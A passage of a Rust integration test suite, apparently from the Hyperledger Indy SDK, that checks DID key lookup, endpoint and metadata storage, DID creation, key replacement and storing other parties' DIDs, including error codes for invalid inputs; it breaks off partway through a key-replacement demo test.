let received_verkey = did::key_for_did(pool_handle, wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_get_key_from_ledger", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_unknown_did() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_key_for_did_works_for_unknown_did");
let res = did::key_for_did(pool_handle, wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_invalid_pool_handle() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_key_for_did_works_for_invalid_pool_handle");
let res = did::key_for_did(INVALID_POOL_HANDLE, wallet_handle, DID_TRUSTEE);
assert_code!(ErrorCode::PoolLedgerInvalidPoolHandle, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_key_for_did_works_for_invalid_pool_handle", &wallet_config);
}
#[test]
fn indy_key_for_did_works_for_invalid_wallet_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_key_for_did_works_for_invalid_wallet_handle");
let res = did::key_for_did(-1, INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_did_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod key_for_local_did {
use super::*;
#[test]
fn indy_key_for_local_did_works_for_my_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_my_did");
let (did, verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
let received_verkey = did::key_for_local_did(wallet_handle, &did).unwrap();
assert_eq!(verkey, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_my_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
let received_verkey = did::key_for_local_did(wallet_handle, DID).unwrap();
assert_eq!(VERKEY, received_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_their_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_key_for_local_did_works_for_unknown_did");
let res = did::key_for_local_did(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_key_for_local_did_works_for_invalid_wallet_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_key_for_local_did_works_for_invalid_wallet_handle");
let res = did::key_for_local_did(INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_key_for_local_did_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod set_endpoint_for_did {
use super::*;
#[test]
fn indy_set_endpoint_for_did_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_replace() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_set_endpoint_for_did_works_for_replace");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, DID).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY, key.unwrap());
let new_endpoint = "10.10.10.1:9710";
did::set_endpoint_for_did(wallet_handle, DID, new_endpoint, VERKEY_MY2).unwrap();
let (updated_endpoint, updated_key) = did::get_endpoint_for_did(wallet_handle, pool_handle, DID).unwrap();
assert_eq!(new_endpoint, updated_endpoint);
assert_eq!(VERKEY_MY2, updated_key.unwrap());
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_set_endpoint_for_did_works_for_replace", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_did");
let res = did::set_endpoint_for_did(wallet_handle, INVALID_BASE58_DID, ENDPOINT, VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_transport_key() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_transport_key");
let res = did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, INVALID_BASE58_VERKEY);
assert_code!(ErrorCode::CommonInvalidStructure, res);
let res = did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, INVALID_VERKEY_LENGTH);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_transport_key", &wallet_config);
}
#[test]
fn indy_set_endpoint_for_did_works_for_invalid_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_endpoint_for_did_works_for_invalid_handle");
let res = did::set_endpoint_for_did(INVALID_WALLET_HANDLE, DID, ENDPOINT, VERKEY);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_endpoint_for_did_works_for_invalid_handle", &wallet_config);
}
}
mod get_endpoint_for_did {
use super::*;
#[test]
fn indy_get_endpoint_for_did_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_endpoint_for_did_works");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, -1, DID).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY, key.unwrap());
utils::tear_down_with_wallet(wallet_handle, "indy_get_endpoint_for_did_works", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_from_ledger() {
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_get_endpoint_for_did_works_from_ledger");
let attrib_data = json!({"endpoint": {"ha": ENDPOINT, "verkey": VERKEY_TRUSTEE}}).to_string();
let attrib_request = ledger::build_attrib_request(&trustee_did, &trustee_did, None, Some(&attrib_data), None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &attrib_request).unwrap();
thread::sleep(std::time::Duration::from_millis(1000));
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, &trustee_did).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(VERKEY_TRUSTEE, key.unwrap());
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_from_ledger", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_from_ledger_for_address_only() {
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_get_endpoint_for_did_works_from_ledger_for_address_only");
let attrib_data = json!({"endpoint": {"ha": ENDPOINT}}).to_string();
let attrib_request = ledger::build_attrib_request(&trustee_did, &trustee_did, None, Some(&attrib_data), None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &attrib_request).unwrap();
thread::sleep(std::time::Duration::from_millis(1000));
let (endpoint, key) = did::get_endpoint_for_did(wallet_handle, pool_handle, &trustee_did).unwrap();
assert_eq!(ENDPOINT, endpoint);
assert_eq!(None, key);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_from_ledger_for_address_only", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_for_unknown_did() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_get_endpoint_for_did_works_for_unknown_did");
let res = did::get_endpoint_for_did(wallet_handle, pool_handle, DID);
assert_code!(ErrorCode::CommonInvalidState, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_invalid_poll_handle() {
let (wallet_handle, pool_handle, wallet_config) = utils::setup_with_wallet_and_pool("indy_get_endpoint_for_did_works_invalid_poll_handle");
let res = did::get_endpoint_for_did(wallet_handle, INVALID_POOL_HANDLE, DID);
assert_code!(ErrorCode::PoolLedgerInvalidPoolHandle, res);
utils::tear_down_with_wallet_and_pool(wallet_handle, pool_handle, "indy_get_endpoint_for_did_works_invalid_poll_handle", &wallet_config);
}
#[test]
fn indy_get_endpoint_for_did_works_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_endpoint_for_did_works_invalid_wallet_handle");
did::set_endpoint_for_did(wallet_handle, DID, ENDPOINT, VERKEY).unwrap();
let res = did::get_endpoint_for_did(INVALID_WALLET_HANDLE, -1, DID);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_endpoint_for_did_works_invalid_wallet_handle", &wallet_config);
}
}
mod set_did_metadata {
use super::*;
#[test]
fn indy_set_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_their_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, DID, VERKEY).unwrap();
did::set_did_metadata(wallet_handle, DID, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_their_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_replace() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_replace");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
let new_metadata = "updated metadata";
did::set_did_metadata(wallet_handle, &did, new_metadata).unwrap();
let updated_metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(new_metadata, updated_metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_replace", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_empty_string() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_empty_string");
did::set_did_metadata(wallet_handle, &did, "").unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_empty_string", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_invalid_did");
let res = did::set_did_metadata(wallet_handle, INVALID_BASE58_DID, METADATA);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_set_did_metadata_works_for_unknown_did");
did::set_did_metadata(wallet_handle, &DID, METADATA).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_set_did_metadata_works_for_invalid_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_set_did_metadata_works_for_invalid_handle");
let res = did::set_did_metadata(INVALID_WALLET_HANDLE, &did, METADATA);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_set_did_metadata_works_for_invalid_handle", &wallet_config);
}
}
mod get_did_metadata {
use super::*;
#[test]
fn indy_get_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_their_did() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_their_did");
did::store_their_did_from_parts(wallet_handle, &did, VERKEY).unwrap();
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!(METADATA.to_string(), metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_their_did", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_empty_string() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_empty_string");
did::set_did_metadata(wallet_handle, &did, "").unwrap();
let metadata = did::get_did_metadata(wallet_handle, &did).unwrap();
assert_eq!("", metadata);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_empty_string", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_no_metadata() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_no_metadata");
let res = did::get_did_metadata(wallet_handle, &did);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_no_metadata", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_did_metadata_works_for_unknown_did");
let res = did::get_did_metadata(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_get_did_metadata_works_for_invalid_handle() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_did_metadata_works_for_invalid_handle");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
let res = did::get_did_metadata(INVALID_WALLET_HANDLE, &did);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_did_metadata_works_for_invalid_handle", &wallet_config);
}
}
mod get_my_did_metadata {
use super::*;
#[test]
fn indy_get_my_did_metadata_works() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_for_no_metadata() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works_for_no_metadata");
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_for_no_metadata", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_with_temp_verkey() {
let (wallet_handle, did, wallet_config) = utils::setup_did("indy_get_my_did_metadata_works_with_temp_verkey");
did::set_did_metadata(wallet_handle, &did, METADATA).unwrap();
did::replace_keys_start(wallet_handle, &did, "{}").unwrap();
did::get_my_did_with_metadata(wallet_handle, &did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_with_temp_verkey", &wallet_config);
}
#[test]
fn indy_get_my_did_metadata_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_get_my_did_metadata_works_for_unknown_did");
let res = did::get_my_did_with_metadata(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_get_my_did_metadata_works_for_unknown_did", &wallet_config);
}
}
mod create_my_did {
use super::*;
use rust_base58::FromBase58;
#[test]
fn indy_create_my_did_works_for_empty_json() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_empty_json");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
assert_eq!(my_did.from_base58().unwrap().len(), 16);
assert_eq!(my_verkey.from_base58().unwrap().len(), 32);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_empty_json", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, Some(MY1_SEED)).unwrap();
assert_eq!(my_did, DID_MY1);
assert_eq!(my_verkey, VERKEY_MY1);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_seed", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_hex_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_hex_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, Some("94a823a6387cdd30d8f7687d95710ebab84c6e277b724790a5b221440beb7df6")).unwrap();
assert_eq!(my_did, "HWvjYf77k1dqQAk6sE4gaS");
assert_eq!(my_verkey, "<KEY>");
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_hex_seed", &wallet_config);
}
#[test]
fn indy_create_my_did_works_as_cid() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_as_cid");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, r#"{"seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa","cid":true}"#).unwrap();
assert_eq!(my_did, VERKEY);
assert_eq!(my_verkey, VERKEY);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_as_cid", &wallet_config);
}
#[test]
fn indy_create_my_did_works_with_passed_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_with_passed_did");
let (my_did, my_verkey) = did::create_my_did(wallet_handle, &format!(r#"{{"did":"{}","seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}}"#, DID)).unwrap();
assert_eq!(my_did, DID);
assert_eq!(my_verkey, VERKEY);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_with_passed_did", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_exists_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_exists_crypto_type");
did::create_my_did(wallet_handle, r#"{"crypto_type":"ed25519"}"#).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_exists_crypto_type", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_wallet_handle");
let res = did::create_my_did(INVALID_WALLET_HANDLE, "{}");
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_duplicate() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_duplicate");
let (my_did, _) = did::create_my_did(wallet_handle, "{}").unwrap();
let res = did::create_my_did(wallet_handle, &format!(r#"{{"did":{:?}}}"#, my_did));
assert_code!(ErrorCode::DidAlreadyExistsError, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_duplicate", &wallet_config);
}
}
mod replace_keys_start {
use super::*;
#[test]
fn indy_replace_keys_start_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
assert_ne!(new_verkey, my_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works", &wallet_config);
}
#[test]
fn indy_replace_keys_start_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works_for_invalid_wallet_handle");
let (my_did, _) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let res = did::replace_keys_start(INVALID_WALLET_HANDLE, &my_did, "{}");
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_replace_keys_start_works_for_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_start_works_for_seed");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, r#"{"seed":"aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa"}"#).unwrap();
assert_eq!(new_verkey, VERKEY);
assert_ne!(my_verkey, new_verkey);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_start_works_for_seed", &wallet_config);
}
}
mod replace_keys_apply {
use super::*;
#[test]
fn indy_replace_keys_apply_works() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works");
let (my_did, my_verkey) = did::create_and_store_my_did(wallet_handle, None).unwrap();
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
assert_ne!(new_verkey, my_verkey);
did::replace_keys_apply(wallet_handle, &my_did).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_without_calling_replace_start() {
let (wallet_handle, my_did, wallet_config) = utils::setup_did("indy_replace_keys_apply_works_without_calling_replace_start");
let res = did::replace_keys_apply(wallet_handle, &my_did);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_without_calling_replace_start", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_for_unknown_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works_for_unknown_did");
let res = did::replace_keys_apply(wallet_handle, DID);
assert_code!(ErrorCode::WalletItemNotFound, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_for_unknown_did", &wallet_config);
}
#[test]
fn indy_replace_keys_apply_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_replace_keys_apply_works_for_invalid_wallet_handle");
let res = did::replace_keys_apply(INVALID_WALLET_HANDLE, DID);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_replace_keys_apply_works_for_invalid_wallet_handle", &wallet_config);
}
}
mod store_their_did {
use super::*;
#[test]
fn indy_store_their_did_works_for_did_only() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_did_only");
let identity_json = json!({"did": DID}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_did_only", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey");
let identity_json = json!({"did": DID, "verkey": VERKEY}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey_with_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey_with_crypto_type");
let identity_json = json!({"did": DID, "verkey": VERKEY.to_owned() + ":ed25519"}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey_with_crypto_type", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_seed() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_seed");
let res = did::create_my_did(wallet_handle, r#"{"seed":"seed"}"#);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_seed", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_wallet_handle() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_wallet_handle");
let identity_json = json!({"did": DID}).to_string();
let res = did::store_their_did(INVALID_WALLET_HANDLE, &identity_json);
assert_code!(ErrorCode::WalletInvalidHandle, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_wallet_handle", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_abbreviated_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_abbreviated_verkey");
let identity_json = r#"{"did":"8wZcEriaNLNKtteJvx7f8i", "verkey":"~<KEY>"}"#;
did::store_their_did(wallet_handle, identity_json).unwrap();
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_abbreviated_verkey", &wallet_config);
}
#[test]
fn indy_create_my_did_works_for_invalid_json() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_create_my_did_works_for_invalid_json");
let res = did::create_my_did(wallet_handle, r#"{"seed":123}"#);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_create_my_did_works_for_invalid_json", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_did() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_did");
let identity_json = json!({"did": INVALID_BASE58_DID}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_did", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_invalid_verkey() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_invalid_verkey");
let identity_json = json!({"did": "did", "verkey":"invalid_base58string"}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::CommonInvalidStructure, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_invalid_verkey", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_verkey_with_invalid_crypto_type() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_verkey_with_invalid_crypto_type");
let identity_json = json!({"did": DID, "verkey": VERKEY.to_owned() + ":crypto_type"}).to_string();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::UnknownCryptoTypeError, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_verkey_with_invalid_crypto_type", &wallet_config);
}
#[test]
fn indy_store_their_did_works_twice() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_twice");
let identity_json = json!({"did": DID}).to_string();
did::store_their_did(wallet_handle, &identity_json).unwrap();
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_twice", &wallet_config);
}
#[test]
fn indy_store_their_did_works_for_is_802() {
let (wallet_handle, wallet_config) = utils::setup_with_wallet("indy_store_their_did_works_for_is_802");
let identity_json = json!({"did": DID, "verkey": VERKEY}).to_string();
// 1. Try 'storeTheirDid' operation with say did1 and verkey1
did::store_their_did(wallet_handle, &identity_json).unwrap();
// 2. Repeat above operation (with same did and ver key used in #1)
// but this time catch and swallow the exception (it will throw the exception WalletItemAlreadyExistsException)
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
// 3. Then, now if you try 'storeTheirDid' operation
// (either with same did and verkey or you can choose different did and verkey),
// in IS-802 it fails with error 'Storage error occurred during wallet operation.'
let res = did::store_their_did(wallet_handle, &identity_json);
assert_code!(ErrorCode::WalletItemAlreadyExists, res);
utils::tear_down_with_wallet(wallet_handle, "indy_store_their_did_works_for_is_802", &wallet_config);
}
}
mod replace_keys {
use super::*;
#[test]
fn indy_replace_keys_demo() {
// 1. Create and open pool
// 2. Create and open wallet
// 3. Generate did from Trustee seed
let (wallet_handle, pool_handle, trustee_did, wallet_config) = utils::setup_trustee("indy_replace_keys_demo");
// 4. Generate my did
let (my_did, my_verkey) = did::create_my_did(wallet_handle, "{}").unwrap();
// 5. Send Nym request to Ledger
let nym_request = ledger::build_nym_request(&trustee_did, &my_did, Some(&my_verkey), None, None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &trustee_did, &nym_request).unwrap();
// 6. Start replacing of keys
let new_verkey = did::replace_keys_start(wallet_handle, &my_did, "{}").unwrap();
// 7. Send Nym request to Ledger with new verkey
let nym_request = ledger::build_nym_request(&my_did, &my_did, Some(&new_verkey), None, None).unwrap();
ledger::sign_and_submit_request(pool_handle, wallet_handle, &my_did, &nym_request).unwrap();
// 8. Send Schema request before apply replacing of keys
let schema_request = ledger::build_schema_request(&my_did, SCHEMA_DATA).unwrap();
